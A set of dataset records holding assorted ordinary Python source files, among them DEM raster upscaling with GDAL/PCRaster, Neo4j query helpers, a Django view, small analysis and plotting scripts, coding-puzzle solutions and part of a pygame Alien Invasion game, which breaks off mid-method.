values')\n\tparser.set_defaults(example=False)\n\tparser.add_argument('--x0', type=int,default =0,\n help='RANDOM WALK: Starting point (default = 0)')\n\tparser.add_argument('--T', nargs='+', type=int,\n help='RANDOM WALK: Target point(s) in time')\n\tparser.add_argument('--n', nargs='+',type=float,\n help='RANDOM WALK: Noise variance(s)')\n\targs = parser.parse_args()\n\n\tmain(args)","sub_path":"RandomWalk.py","file_name":"RandomWalk.py","file_ext":"py","file_size_in_byte":3092,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"240066760","text":"#! /usr/bin/python\n\n# make sure the following modules are loaded \n#~ $ module load eb\n#~ $ module load GDAL\n#~ $ . /home/edwin/bin-special/pcraster-4.1.0-beta-20151027_x86-64_gcc-4/bashrc_special_pcraster_modflow\n\nimport os\nimport sys\nimport gdal\nimport pcraster as pcr\n\nimport virtualOS as vos\n\n# give your tile code as the system argument\ntile_code = \"dem_tif_n60w180\"\ntile_code = sys.argv[1]\n\n\ninput_folder = \"/projects/0/dfguu/users/sandrahw/download/\" + tile_code\noutput_folder = \"/projects/0/dfguu/users/sandrahw/MERIT_upscaled_30sec/\" + tile_code\n\n# make and set the directory to the output folder\ncmd = \"mkdir -p \" + output_folder\nprint(cmd); os.system(cmd)\nos.chdir(output_folder)\n# - cleaning the output folder\ncmd = \"rm -r \" + output_folder + \"/*\"\nprint(cmd); os.system(cmd)\n\n# merge all tif files\ninput_tif_files = input_folder + \"/*\"\noutput_file = output_folder + \"/\" + tile_code + \".tif\"\ncmd = \"python /hpc/eb/RedHatEnterpriseServer7/GDAL/2.2.3-foss-2017b-Python-2.7.14/bin/gdal_merge.py -o \" + output_file + \" \" + input_tif_files \nprint(cmd); os.system(cmd)\n#\n# - then convert it to a pcraster file:\ninput_tif_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".map\"\ncmd = \"gdal_translate -of PCRaster \" + input_tif_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n# - this is an original input pcraster map at 3 arc sec resolution\n\n\n# prepare the clone map at 30 arc sec resolution (e.g. $ mapattr -s -R 1800 -C 3600 -B -P yb2t -x -180 -y 75 -l 0.008333333333333333333333333333333333333333333333333333 dem_tif_n60w180.30sec.clo.map)\nnum_of_rows_30sec = str(vos.getMapAttributesALL(output_file)[\"rows\"] / 10.)\nnum_of_cols_30sec = str(vos.getMapAttributesALL(output_file)[\"cols\"] / 10.)\nx_coordinate = str(vos.getMapAttributesALL(output_file)[\"xUL\"])\ny_coordinate = str(vos.getMapAttributesALL(output_file)[\"yUL\"])\ncellsize_30sec = \"0.00833333333333333333333333333333333333333333333333333333333333333333333333333333\"\noutput_file = output_folder + \"/\" + tile_code + \".30sec.clo.map\"\ncmd = \"mapattr -s -R \" + num_of_rows_30sec + \" -C \" + num_of_cols_30sec + \" -B -P yb2t -x \" + x_coordinate + \" -y \" + y_coordinate + \" -l \" + cellsize_30sec + \" \" + output_file\nprint(cmd); os.system(cmd)\n\n\n# give the ids for every 30 arc sec cell (e.g. pcrcalc dem_tif_n60w180_30sec.ids.map = \"nominal(uniqueid(dem_tif_n60w180_30sec.clo.map))\")\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.ids.map\"\npcr.setclone(input_file)\nprint(\"Making the clone map at 30 arcsec resolution.\")\nunique_ids_30sec = pcr.nominal(pcr.uniqueid(input_file))\npcr.report(unique_ids_30sec, output_file)\n# - Note that this map has 30 arc sec resolution.\n\n\n# resample the ids map to 3 arc sec resolution (e.g. 
gdalwarp -tr 0.00083333333333333333333333333333333333333 0.00083333333333333333333333333333333333333 dem_tif_n60w180_30sec.ids.map dem_tif_n60w180_30sec.ids.3sec.tif\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.ids.3sec.tif\"\ncellsize_3sec = \"0.000833333333333333333333333333333333333333333333333333333333333333333333333333333\"\ncmd = \"gdalwarp -tr \" + cellsize_3sec + \" \" + cellsize_3sec + \" \" + input_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n# - This still a tif file. \n\n# convert the tif file to PCRaster map\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.ids.3sec.map\"\ncmd = 'gdal_translate -of PCRaster ' + input_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n\n# make sure that the clone of input DEM is consistent with the aforementioned clone:\nids_3sec = output_file\ndem_3sec = output_folder + \"/\" + tile_code + \".map\"\ncmd = \"mapattr -c \" + ids_3sec + \" \" + dem_3sec\nprint(cmd); os.system(cmd)\n# - check\ncmd = \"mapattr -p \" + ids_3sec + \" \" + dem_3sec\nprint(cmd); os.system(cmd)\n\n \n# do the upscaling/averaging from 3 arc second DEM to 30 arc second values:\npcr.setclone(ids_3sec)\nmsg = \"Upscaling in progress for the tile \" + tile_code\nprint(msg)\ndem_30sec = pcr.areaaverage(dem_3sec, ids_3sec)\noutput_file = output_folder + \"/\" + tile_code + \".30sec.3sec.map\"\npcr.report(dem_30sec, output_file)\n# - The cell size will be still 3 arc second.\n\n\n# then resample (using gdalwarp) to 30 arc second file:\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.tif\"\ncmd = \"gdalwarp -tr \" + cellsize_30sec + \" \" + cellsize_30sec + \" \" + input_file + \" \" + output_file \nprint(cmd); os.system(cmd)\n# - this is still a tif file\n\n# convert it to pcraster\ninput_file = output_file\noutput_file = output_folder + \"/\" + tile_code + \".30sec.map\"\ncmd = \"gdal_translate -of PCRaster \" + input_file + \" \" + output_file\nprint(cmd); os.system(cmd)\n\n\n#~ # check (this should be deactivated while running all parallel scripts)\n#~ dem_3sec_file = dem_3sec\n#~ dem_30sec_file = output_file\n#~ cmd = \"aguila \" + dem_3sec_file + \" \" + dem_30sec_file\n#~ print(cmd); os.system(cmd)\n","sub_path":"process_merit-dem/scripts_used_by_sandra/upscale_script.py","file_name":"upscale_script.py","file_ext":"py","file_size_in_byte":4910,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"468396099","text":"CREATE_PARENT_SENTENCE_STATEMENT = \"\"\"\n CREATE (s1:Sentence {tokens: {token_seq}})\n\"\"\"\n\nMERGE_TOKEN_STATEMENT = \"\"\"\n MERGE (t1:Token {content: {token_content}})\n\"\"\"\n\nCREATE_CONTAINS_RELATIONSHIP = \"\"\"\n MATCH (s1:Sentence {tokens: {token_seq}}), (t1:Token {content: {token_content}})\n CREATE (s1)-[:CONTAINS {relationship_properties}]->(t1);\n\"\"\"\n\nCREATE_CATEGORY_RELATIONSHIP_STATEMENT = \"\"\"\n MATCH (s1:Sentence {tokens: {token_seq}}), (t1:Taxon {name: {category}})\n CREATE (s1)-[:IN_CATEGORY]->(t1)\n\"\"\"\n\nimport misc\nimport pprint\n\nclass DataService(object):\n def __init__(self):\n pass\n\n def create_occupation_description_from_tokens(self, token_seq, category):\n result = misc.run_some_query(\n CREATE_PARENT_SENTENCE_STATEMENT, {\n 'token_seq': token_seq,\n 'category': category\n }\n )\n\n for index, value in enumerate(token_seq):\n self.merge_token(value)\n self.create_sentence_relationship(token_seq, index, value)\n\n 
self.create_category_relationship(token_seq, category)\n \n return result\n\n def create_category_relationship(self, token_seq, category):\n misc.run_some_query(\n CREATE_CATEGORY_RELATIONSHIP_STATEMENT, {\n 'token_seq': token_seq,\n 'category': category\n }\n )\n\n def merge_token(self, value):\n misc.run_some_query(MERGE_TOKEN_STATEMENT, {'token_content': value})\n\n def create_sentence_relationship(self, token_seq, index, value):\n rel_properties = {'index': index}\n\n if index == 0:\n rel_properties['firstToken'] = True\n elif index == len(token_seq) - 1:\n rel_properties['lastToken'] = True\n\n misc.run_some_query(\n CREATE_CONTAINS_RELATIONSHIP,\n {\n 'token_seq': token_seq,\n 'relationship_properties': rel_properties,\n 'token_content': value\n }\n )\n","sub_path":"occubrow/data_service.py","file_name":"data_service.py","file_ext":"py","file_size_in_byte":2022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"93870641","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Oct 18 17:08:27 2018\n\n@author: admin\n\"\"\"\n'''perl c:/code/mrun.pl -cmd \"c:/Users/admin/Anaconda3/python.exe c:/code/ind/group.py e:/hx/stock/csv e:/hx/ind/all e:/hx/ind/sum\" -proc 1'''\nimport pandas as pd\nimport sys\nimport matplotlib.pyplot as plt\ndts=[20180102,\n20180103,\n20180104,\n20180105,\n20180108,\n20180109,\n20180110,\n20180111,\n20180112,\n20180115,\n20180116,\n20180117,\n20180118,\n20180119,\n20180122,\n20180123,\n20180124,\n20180125,\n20180126,\n20180129,\n20180130,\n20180131]\n\ndatad=dict()\ndef corr():\n file=sys.argv[1]\n filenew=sys.argv[2]\n filedd=sys.argv[3]\n a=pd.read_csv(file,usecols=[1,2,3],header=None)\n b=a.pivot(index=2,columns=1,values=3)\n c=b.corr()\n c.to_csv(filenew)\n c.describe().T.describe().to_csv(filedd)\n#corr()\ndef loadMerge(dt):\n datad[dt]=pd.read_csv(f\"c:/hx/cppind/{dt}.csv\",index_col=0,names=['corr'])['corr']\n\n# load every daily file so that tmean is defined for the selections below\nfor dt in dts:\n print(dt)\n loadMerge(dt)\n\nds=pd.DataFrame(datad)\ntmp=ds.dropna()\ntmean=tmp.mean(axis=1)\n# successive filters overwrite corrStock; only the last one takes effect\ncorrStock=tmean[tmean>(tmean.mean()+2*tmean.std())]\n\ncorrStock=tmean[tmean>0.7]\ncorrStock=tmean[tmean<-0.3]\nstockDict=dict()\nfor i in corrStock.index:\n sym1=i[0:9]\n sym2=i[10:19]\n if sym1 in stockDict:\n stockDict[sym1].append(sym2)\n else:\n stockDict[sym1]=[sym2]\n if sym2 in stockDict:\n stockDict[sym2].append(sym1)\n else:\n stockDict[sym2]=[sym1]\n\n'''\nconcat\npivot\nmoving window\n 20 days\noutlier\n baseline: the whole dataset, or the stock's own previous 20 days of data\n'''\n","sub_path":"ind/group.py","file_name":"group.py","file_ext":"py","file_size_in_byte":1598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"58922759","text":"from django.views.generic import FormView\nfrom django.utils.functional import cached_property\nfrom django.shortcuts import redirect\nfrom django.http import Http404\n\nfrom program_manager.models import Program\n\nfrom . import utils\nfrom . 
import forms\n\n\nclass MapFieldsView(FormView):\n form_class = forms.MapFieldsForm\n template_name = 'field_mapper/map_fields.html'\n\n def dispatch(self, *args, **kwargs):\n program = self.program\n\n if program.status != 'CREA':\n return redirect(program.get_absolute_url())\n\n all_fields, missing_fields = utils.validate_csv(program.csv_file.file,\n program, ret=True)\n\n if not missing_fields:\n return redirect('/')\n\n self.missing_fields = missing_fields\n self.all_fields = all_fields\n\n return super(MapFieldsView, self).dispatch(*args, **kwargs)\n\n def get_form_kwargs(self):\n kwargs = super(MapFieldsView, self).get_form_kwargs()\n kwargs.update({\n 'program': self.program,\n 'all_fields': self.all_fields,\n 'missing_fields': self.missing_fields,\n })\n\n return kwargs\n\n def form_valid(self, form):\n form.save()\n\n # rewind csv_file\n self.program.csv_file.seek(0)\n\n self.program.begin()\n\n return redirect(self.program.get_absolute_url())\n\n @cached_property\n def program(self):\n try:\n program = Program.objects.get(pk=self.kwargs.get('pk'))\n except Program.DoesNotExist:\n raise Http404\n\n return program\n","sub_path":"field_mapper/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"486865081","text":"# -*- coding: utf-8 -*-\n\n\"\"\"FDC module dealing with quarter.\"\"\"\n\nimport time\nfrom string import Template\n\n\nclass Round:\n\n \"\"\"\n FDC Round allows to compute accurate timestamps for start and end of each quarter of the round.\n\n start and end timestamp are returned as a dictionnary of string { 'start': \"...\", 'end': \"...\" }\n \"\"\"\n\n QUARTER = [\n {'start': \"0101000000\", 'end': \"0331235959\"},\n {'start': \"0401000000\", 'end': \"0630235959\"},\n {'start': \"0701000000\", 'end': \"0930235959\"},\n {'start': \"1001000000\", 'end': \"1231235959\"}\n ]\n\n def __init__(self, year1, year2, round_number):\n \"\"\"Constructor.\n\n Args:\n year1 (int): Year of request of round 1\n year2 (int): Year of request of round 2\n round_number (int): FDC round number,\n either 1 for round 1 and 2 for round 2\n\n Raises:\n ValueError: if round is not 1 or 2\n \"\"\"\n self.year1 = year1\n self.year2 = year2\n if round_number in [1, 2]:\n self.round = round_number\n else:\n raise ValueError(\n \"Round number should be either 1 or 2 but is %d\" % round_number)\n\n def quarter(self, quarter):\n \"\"\"Returns the timestamp of start and end of the quarter.\n\n Args:\n quarter (int): Number of the quarter (values are between 1 and 4)\n\n Returns:\n both timestamp of start and end of the quarter as {'start': \"XXX\", 'end': \"YYY\"}\n\n Raises:\n ValueError: if quarter is not in 1..4\n \"\"\"\n year = self.year2\n index = quarter - 1\n if not quarter in range(1, 5):\n raise ValueError(\n \"quarter should be between 1 and 4 but is %d\" % quarter)\n if self.round == 2:\n index = (quarter + 1) % 4\n if quarter >= 3:\n year = self.year2 + 1\n return {\n 'start': str(year) + Round.QUARTER[index]['start'],\n 'end': str(year) + Round.QUARTER[index]['end']}\n\n def full_period(self):\n \"\"\"Returns the timestamp of start of the period and the timestamp of end of the period\n\n Returns:\n both timestamp of start and end of the period as {'start': \"XXX\", 'end': \"YYY\"}\n \"\"\"\n return {\n 'start': self.quarter(1)['start'],\n 'end': self.quarter(4)['end']\n }\n\n def _today(self):\n \"\"\"Returns timestamp of today 0000Z\"\"\"\n return 
time.strftime(\"%Y%m%d000000\", time.gmtime())\n\n def __repr__(self):\n return \"%s-%s round%s\" % (self.year1, self.year2, self.round)\n\n\nclass Indicator:\n\n \"\"\"Indicator for FDC reports have values for Q1, Q2, Q3, Q4 or/and a value.\n it allows to follow the evolution of an indicator during the quarters and have its final value\n or to follow an indicator with only a single value.\n \"\"\"\n\n def __init__(self, name, q1=None, q2=None, q3=None, q4=None, value=None):\n \"\"\"Constructor returns an indicator.\n it can be initilized with values for q1, q2, q3, q4 and another value (cumulative)\n\n Args:\n name (str): Unique name (can be used to refer to the indicator)\n q1 (float): Value at first quarter (optional)\n q2 (float): Value at second quarter (optional)\n q3 (float): Value at third quarter (optional)\n q4 (float): Value at fourth quarter (optional)\n value (float): A value of the indicator that has no relation to a quarter: cumulative value, fixed value, whatever (optional)\n \"\"\"\n self.name = name\n self.values = dict()\n self.values[\"q1\"] = q1\n self.values[\"q2\"] = q2\n self.values[\"q3\"] = q3\n self.values[\"q4\"] = q4\n self.values[\"value\"] = value\n\n\nclass Report:\n\n \"\"\"Report is build from indicator list and template\n and generate a report.\n \"\"\"\n\n def __init__(self, indicator_list, template_string=None, template_file=None):\n \"\"\" Initialize a report.\n\n In template variables are named:\n $name_q1, $name_q2 $name_q3, $name_q4, $name_value\n\n Args:\n indicator_list (list): list of fdc.Indicator\n template_string (str): Template string of the report to use (iff there is no template_file)\n template_file (file): File containing the template string to use to generate the report\n \"\"\"\n self.template = Template(template_string)\n self.indicator_values = dict()\n if template_string == None and template_file == None:\n raise ValueError(\n \"template_string or template_file argument needs to be used.\")\n if template_file != None:\n # reads template file\n with open(template_file, 'r') as f:\n self.template = Template(f.read())\n # fill the dictionnary of values\n for indicator in indicator_list:\n for key in indicator.values.keys():\n var_name = \"%s_%s\" % (indicator.name, key)\n if indicator.values[key]==None:\n self.indicator_values[var_name] = \"\"\n else:\n self.indicator_values[var_name] = indicator.values[key]\n\n def generate(self):\n \"\"\" Generate report from template and indicators.\n \"\"\"\n return self.template.safe_substitute(self.indicator_values)\n","sub_path":"wm_metrics/fdc.py","file_name":"fdc.py","file_ext":"py","file_size_in_byte":5491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"470030386","text":"import PySimpleGUI as sg\nimport analyze as an\n\n\n\ngames_categories = ['ALL','ACTION','ADVENTURE','ARCADE','BOARD','CARD','CASINO','CASUAL','EDUCATIONAL','MUSIC','PUZZLE','RACING','ROLE PLAYING','SIMULATION','SPORTS','STRATEGY','TRIVIA','WORD']\n\ndef create_layout():\n\n layout = [[sg.Text('Datos disponibles \\npara analizar', font = '_ 20', relief = sg.RELIEF_RIDGE, justification = 'center', background_color = '#6E402A')],\n [sg.Text('', background_color = '#D89156')],\n [sg.Button('Canciones de Spotify', size = (16,1), button_color = '#6E402A'), sg.Input('ALL', size = (12,1), key = 'artist')],\n [sg.Button('Juegos de Play Store', size = (16,1), button_color = '#6E402A'), sg.Combo(games_categories, size = (12,1), key = 'game_option')],\n [sg.Button('Salir', size = 
(6,1), button_color = '#6E402A')]]\n return sg.Window('Actividad 1 x Python Plus - TEORIA', layout, background_color = '#D89156', margins = (75,50), finalize = True)\n\n\n\ndef main():\n window = create_layout()\n \n while True: \n event, values = window.read()\n \n if event == sg.WIN_CLOSED or event == 'Salir':\n break\n\n elif event == 'Canciones de Spotify':\n if values.get('artist') != '':\n an.music_analysis(values.get('artist'))\n else:\n sg.PopupQuick('Ingrese un valor válido', background_color = '#D89156', button_color = '#6E402A')\n\n elif event == 'Juegos de Play Store':\n if values.get('game_option') in games_categories:\n an.game_analysis(values.get('game_option'))\n else:\n sg.PopupQuick('Ingrese un valor válido', background_color = '#D89156', button_color = '#6E402A')\n\n window.close()\n\n\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"actividad1-teoria/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"371983668","text":"'''\nGiven a binary tree, find the maximum path sum.\n\nFor this problem, a path is defined as any sequence of nodes from some starting node to any node in the tree along the parent-child connections. The path must contain at least one node and does not need to go through the root.\n\nFor example:\nGiven the below binary tree,\n\n 1\n / \\\\\n 2 3\nReturn 6.\n'''\n\"\"\"\nDefinition of TreeNode:\nclass TreeNode:\n def __init__(self, val):\n this.val = val\n this.left, this.right = None, None\n\"\"\"\n# needed for sys.maxint used below (Python 2)\nimport sys\n\nclass Solution:\n \"\"\"\n @param root: The root of binary tree.\n @return: An integer\n \"\"\"\n def maxPathSum(self, root):\n (maxSum, single) = self.maxPathHelper(root)\n return maxSum\n\n def maxPathHelper(self, root):\n if root is None:\n return -sys.maxint, 0\n\n left = self.maxPathHelper(root.left)\n right = self.maxPathHelper(root.right)\n maxpath = max(left[0], right[0], root.val + left[1] + right[1])\n single = max(left[1] + root.val, right[1] + root.val, 0)\n\n return (maxpath, single)\n","sub_path":"Python/leetcode/124-BinaryTreeMaximumPathSum-FFFFF.py","file_name":"124-BinaryTreeMaximumPathSum-FFFFF.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"483145938","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 2 22:20:34 2020\n\n@author: luhoe\n\"\"\"\nimport json\nimport os\nfrom tqdm import tqdm\n\n# folder containing the downloaded .json files\ndata_folder = \"C:\\\\Users\\\\luhoe\\\\Documents\\\\Git_Projects\\\\Github\\\\youtube-comment-downloader\\\\Data\\\\Galileo\"\n\n\n# prepare data for word2vec\n\nmin_len = 10\nmax_len = 300\n\nwith open(data_folder + '_summary.txt', 'a') as file:\n for filename in tqdm(os.listdir(data_folder)):\n if filename.endswith(\".json\"): \n \n f = open(data_folder + '\\\\' + filename)\n data = json.load(f)\n comments = data['comments']\n\n # separating initial comments from answers and writing comments to the summary file\n for comment in comments:\n if '.' 
not in (comments[comment]['cid']): \n try:\n if (len(comments[comment]['text']) > min_len) and (len(comments[comment]['text']) < max_len):\n file.write(comments[comment]['text'] + '\\n')\n except:\n file.write(comments[comment]['text'].encode('ascii', 'ignore').decode('ascii') + '\\n')\n else:\n isAnswer = True\n\n continue\n else:\n continue\n\n\n","sub_path":"nlp_data_cleaner.py","file_name":"nlp_data_cleaner.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"300785477","text":"import itertools\n\n\nt = int(raw_input())\n\n\ndef isprime(n):\n divisor = 5\n prime = True\n if n < 2:\n prime = False\n elif n < 4:\n prime = True\n elif n % 2 == 0 or n % 3 == 0:\n prime = False\n else:\n while n >= divisor ** 2:\n if n % divisor == 0 or n % (divisor + 2) == 0:\n prime = False\n break\n divisor += 6\n return prime\n\n\ndef get_divisor(n):\n divisor = 2\n while divisor < n:\n if n % divisor == 0:\n break\n else:\n divisor += 1\n return divisor\n\n\nfor x in xrange(1, t + 1):\n n, j = (int(value) for value in raw_input().split())\n print(\"Case #%d:\" % x)\n jamcoins = 1\n for value in itertools.product(xrange(2), repeat=n - 2):\n if jamcoins > j:\n break\n output = \"\".join([\"1\"] + [str(hue) for hue in value] + [\"1\"])\n outputs = [output]\n is_jamcoin = True\n for base in xrange(2, 11):\n temp = long(output, base=base)\n if isprime(temp):\n is_jamcoin = False\n break\n else:\n outputs.append(get_divisor(temp))\n if is_jamcoin:\n temp = \"%s \" * 10\n print(temp % tuple(outputs))\n jamcoins += 1\n","sub_path":"codes/CodeJamCrawler/16_0_3_neat/16_0_3_nansari_2016-03.py","file_name":"16_0_3_nansari_2016-03.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"624394654","text":"# Own Library\nimport mcmc_tools\nimport analysis_data as ad\n\nimport seaborn as sns\nimport matplotlib.pyplot as plt\n\n\nclass SPM(ad.AnalysisData):\n def observe_ts(self):\n sns.lineplot(x=self.data['X'], y=self.data['Y'])\n plt.show()\n plt.close()\n\n def create_data(self):\n X = self.data['X']\n Y = self.data['Y']\n N = len(Y)\n N_pred = 3\n\n return {\n 'X': X,\n 'Y': Y,\n 'N': N,\n 'N_pred': N_pred\n }\n\n def fit(self, stan_data):\n mcmc_result = mcmc_tools.sampling(self.model_file, stan_data, n_jobs=4, seed=123)\n return mcmc_result.extract()\n\n def create_figure(self, mcmc_sample):\n pred_dates = [i for i in range(len(self.data['Y']) + 3)]\n # pred_dates = np.linspace(0, len(self.data['Y']) + 3, 100)\n mcmc_tools.plot_ssm(mcmc_sample, pred_dates, '2nd diff local level '\n 'model', 'Y', 'mu_pred')\n\n\nif __name__ == '__main__':\n spm = SPM('data-ss1.txt', '../model/model12-1-2')\n spm.describe()\n\n spm.observe_ts()\n\n stan_data = spm.create_data()\n mcmc_sample = spm.fit(stan_data)\n spm.create_figure(mcmc_sample)\n\n","sub_path":"exec/12-1-2.py","file_name":"12-1-2.py","file_ext":"py","file_size_in_byte":1223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"469200267","text":"# -*- coding: utf-8 -*-\r\n\r\nfrom random import random\r\nfrom matplotlib import pyplot as plt\r\n\r\nx = list(range(1,1001))\r\nx = list(map(lambda data : str(data), x))\r\n\r\ny = [int(1000 * random()) for data in x]\r\n\r\nplt.title('Scatter example')\r\nplt.xlabel(\"x : 1 ~ 1000\")\r\nplt.ylabel(\"y : random * 1000\")\r\n\r\n#plt.plot(x, y)\r\n#plt.bar(x, y)\r\n# Scatter plot\r\n# A graph that displays the distribution of values 
as points rather than as a line\r\n# Reference site\r\n# https://matplotlib.org/api/pyplot_api.html#matplotlib.pyplot.scatter\r\nplt.scatter(x, y)\r\nplt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"day_08/matplotlib_15.py","file_name":"matplotlib_15.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"440330955","text":"from .module import Module\n\n\nclass Potentiometer(Module):\n possible_events = {'moved'}\n\n def __init__(self, id, alias, robot):\n Module.__init__(self, 'Potentiometer', id, alias, robot)\n self._value = 0\n\n @property\n def position(self):\n \"\"\" Position in degrees. \"\"\"\n return self._value\n\n def _update(self, new_state):\n Module._update(self, new_state)\n new_pos = new_state['position']\n\n if new_pos != self._value:\n self._value = new_pos\n self._pub_event('moved', self._value, self.position)\n","sub_path":"pyluos/modules/potentiometer.py","file_name":"potentiometer.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"335471032","text":"import sys\nfrom time import sleep\nimport pygame\nfrom settings import Settings\nfrom game_stats import GameStats\nfrom button import Button\nfrom ship import Ship\nfrom bullet import Bullet\nfrom alien import Alien\n\n\nclass AlienInvasion:\n\t# Class for managing game resources and behavior.\n\n\tdef __init__(self):\n\t\tpygame.init()\n\t\tself.settings = Settings()\n\n\t\tself.screen = pygame.display.set_mode(\n\t\t\t(self.settings.screen_width, self.settings.screen_height))\n\t\tself.game_screen = pygame.Surface((self.settings.game_screen_width, self.settings.game_screen_height))\n\t\tself.game_screen_rect = self.game_screen.get_rect(center=(self.settings.screen_width // 2, self.settings.screen_height // 2))\n\t\tpygame.display.set_caption(\"Alien Invasion\")\n\n\t\t# Create an instance to store game statistics\n\t\tself.stats = GameStats(self)\n\n\t\tself.ship = Ship(self)\n\t\tself.bullets = pygame.sprite.Group()\n\t\tself.aliens = pygame.sprite.Group()\n\n\t\tself._create_fleet()\n\t\t# Create the Play button\n\t\tself.play_button = Button(self, \"Play\")\n\t\t# self.clock = pygame.time.Clock()\n\n\n\tdef run_game(self):\n\t\t# Start the main game loop\n\t\twhile True:\n\t\t\tself._check_events()\n\n\t\t\tif self.stats.game_active:\n\t\t\t\tself.ship.update()\n\t\t\t\tself._update_bullets()\n\t\t\t\tself._update_aliens()\n\n\t\t\tself._update_screen()\n\t\t\t\n\tdef _update_screen(self):\n\t\t# Redraw the screen on each pass through the loop\n\t\tself.screen.fill(self.settings.bg_color)\n\t\tself.screen.blit(self.game_screen,\n\t\t\t\tself.game_screen_rect)\n\t\tself.game_screen.fill((0, 0, 150))\n\t\tself.ship.blitme()\n\t\tfor bullet in self.bullets.sprites():\n\t\t\tbullet.draw_bullet()\n\t\tself.aliens.draw(self.game_screen)\n\n\t\t# The Play button is displayed only when the game is inactive\n\t\tif not self.stats.game_active:\n\t\t\tself.play_button.draw_button()\n\n\t\t#self.clock.tick(self.settings.fps) attempt at a frame rate cap\n\t\tself._arcade_frame()\n\n\t\t# Display the most recently drawn screen\t\t\n\t\tpygame.display.flip()\n\n\tdef _check_events(self):\n\t\t# Watch for keyboard and mouse events\n\t\tfor event in pygame.event.get():\n\t\t\tif event.type == pygame.QUIT: \n\t\t\t\tsys.exit()\n\t\t\telif event.type == 
pygame.KEYDOWN:\n\t\t\t\tself._check_keydown_events(event)\n\t\t\telif event.type == pygame.KEYUP:\n\t\t\t\tself._check_keyup_events(event)\n\t\t\telif event.type == pygame.MOUSEBUTTONDOWN:\n\t\t\t\tmouse_pos = pygame.mouse.get_pos()\n\t\t\t\tself._check_play_button(mouse_pos)\n\n\tdef _check_play_button(self, mouse_pos):\n\t\t\"\"\"Starts a new game when the Play button is clicked\"\"\"\n\t\tbutton_clicked = self.play_button.rect.collidepoint(mouse_pos)\n\t\tif button_clicked and not self.stats.game_active:\n\t\t\t# Reset the game statistics\n\t\t\tself.stats.reset_stats()\n\t\t\tself.stats.game_active = True\n\n\t\t\t# Clear the lists of aliens and bullets\n\t\t\tself.aliens.empty()\n\t\t\tself.bullets.empty()\n\n\t\t\t# Create a new fleet and center the ship\n\t\t\tself._create_fleet()\n\t\t\tself.ship.center_ship()\n\n\t\t\t# Hide the mouse cursor\n\t\t\tpygame.mouse.set_visible(False)\n\n\n\n\tdef _check_keydown_events(self, event):\n\t\t# Respond to keypresses\n\t\tif event.type == pygame.KEYDOWN:\n\t\t\tif event.key == pygame.K_RIGHT:\n\t\t\t\tself.ship.moving_right = True\n\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\tself.ship.moving_left = True\n\t\t\telif event.key == pygame.K_q:\n\t\t\t\tsys.exit()\n\t\t\telif event.key == pygame.K_SPACE:\n\t\t\t\tself._fire_bullet()\n\n\tdef _check_keyup_events(self, event):\n\t\tif event.type == pygame.KEYUP:\n\t\t\tif event.key == pygame.K_RIGHT:\n\t\t\t\tself.ship.moving_right = False\n\t\t\telif event.key == pygame.K_LEFT:\n\t\t\t\tself.ship.moving_left = False\n\n\tdef _fire_bullet(self):\n\t\t# Create a new bullet and add it to the bullets group.\n\t\tif len(self.bullets) < self.settings.bullets_allowed:\n\t\t\tnew_bullet = Bullet(self)\n\t\t\tself.bullets.add(new_bullet)\n\n\tdef _update_bullets(self):\n\t\t\"\"\"Update bullet positions and get rid of old bullets\"\"\"\t\t\n\t\t# Update the bullet positions.\n\t\tself.bullets.update()\n\n\t\t# Remove bullets that have gone off the edge of the screen.\n\t\tfor bullet in self.bullets.copy():\n\t\t\tif bullet.rect.bottom <= 0:\n\t\t\t\tself.bullets.remove(bullet)\n\n\t\tself._check_bullet_alien_collisions()\n\n\n\tdef _check_bullet_alien_collisions(self):\n\t\t\"\"\"Handle collisions between bullets and aliens\"\"\"\n\t\t# Remove any bullets and aliens that have collided\n\t\tcollisions = pygame.sprite.groupcollide(\n\t\t\tself.bullets, self.aliens, True, True)\n\n\t\tif not self.aliens:\n\t\t\t# Destroy existing bullets and create a new fleet\n\t\t\tself.bullets.empty()\n\t\t\tself._create_fleet()\n\n\tdef _ship_hit(self):\n\t\t\"\"\"Handle the ship colliding with an alien\"\"\"\n\t\tif self.stats.ships_left > 0:\n\t\t\t# Decrement 